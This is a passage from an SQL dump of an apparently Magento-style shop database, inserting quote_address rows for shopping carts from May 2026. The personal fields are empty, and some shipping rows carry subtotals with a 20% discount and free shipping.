(2153, 1260, '2026-05-05 17:51:59', '2026-05-05 17:51:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2154, 1260, '2026-05-05 17:51:59', '2026-05-05 17:51:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2155, 1261, '2026-05-05 19:38:15', '2026-05-05 19:38:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2156, 1261, '2026-05-05 19:38:15', '2026-05-05 19:38:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2157, 1262, '2026-05-05 23:51:36', '2026-05-05 23:51:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2158, 1262, '2026-05-05 23:51:36', '2026-05-05 23:51:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2159, 1263, '2026-05-06 03:15:28', '2026-05-06 03:15:28', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2160, 1263, '2026-05-06 03:15:28', '2026-05-06 03:15:28', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2161, 1264, '2026-05-06 08:00:59', '2026-05-06 08:00:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2162, 1264, '2026-05-06 08:00:59', '2026-05-06 08:00:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2163, 1265, '2026-05-06 11:00:33', '2026-05-06 11:00:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2164, 1265, '2026-05-06 11:00:33', '2026-05-06 11:00:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2165, 1266, '2026-05-06 16:08:51', '2026-05-06 16:08:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2166, 1266, '2026-05-06 16:08:51', '2026-05-06 16:08:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2167, 1267, '2026-05-06 18:45:46', '2026-05-06 18:45:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(2168, 1267, '2026-05-06 18:45:46', '2026-05-06 18:45:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2169, 1268, '2026-05-06 23:54:09', '2026-05-06 23:54:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2170, 1268, '2026-05-06 23:54:09', '2026-05-06 23:54:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2171, 1269, '2026-05-07 02:29:23', '2026-05-07 02:29:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2172, 1269, '2026-05-07 02:29:23', '2026-05-07 02:29:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2173, 1270, '2026-05-07 07:37:08', '2026-05-07 07:37:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2174, 1270, '2026-05-07 07:37:08', '2026-05-07 07:37:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2175, 1271, '2026-05-07 10:10:25', '2026-05-07 10:10:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2176, 1271, '2026-05-07 10:10:25', '2026-05-07 10:10:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2177, 1272, '2026-05-07 15:53:14', '2026-05-07 15:53:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2178, 1272, '2026-05-07 15:53:14', '2026-05-07 15:53:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2179, 1273, '2026-05-07 17:06:15', '2026-05-07 17:06:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2180, 1273, '2026-05-07 17:06:15', '2026-05-07 17:06:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2181, 1274, '2026-05-07 18:04:40', '2026-05-07 18:04:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2182, 1274, '2026-05-07 18:04:40', '2026-05-07 18:04:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2183, 1275, '2026-05-07 23:39:56', '2026-05-07 23:39:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2184, 1275, '2026-05-07 23:39:56', '2026-05-07 23:39:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2185, 1276, '2026-05-08 07:13:23', '2026-05-08 07:13:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2186, 1276, '2026-05-08 07:13:23', '2026-05-08 07:13:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2187, 1277, '2026-05-08 07:59:15', '2026-05-08 07:59:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2188, 1277, '2026-05-08 07:59:15', '2026-05-08 07:59:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2189, 1278, '2026-05-08 15:07:29', '2026-05-08 15:07:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2190, 1278, '2026-05-08 15:07:29', '2026-05-08 15:07:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2191, 1279, '2026-05-08 22:33:37', '2026-05-08 22:33:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2192, 1279, '2026-05-08 22:33:37', '2026-05-08 22:33:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2193, 1280, '2026-05-08 23:47:55', '2026-05-08 23:47:55', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2194, 1280, '2026-05-08 23:47:55', '2026-05-08 23:47:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(2195, 1281, '2026-05-09 02:48:27', '2026-05-09 02:48:27', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(2196, 1281, '2026-05-09 02:48:27', '2026-05-09 02:48:27', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 422.0000, 422.0000, 337.6000, 337.6000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.4000, -84.4000, 337.6000, 337.6000, NULL, '[]', NULL, 0.0000, 0.0000, 422.0000, 422.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
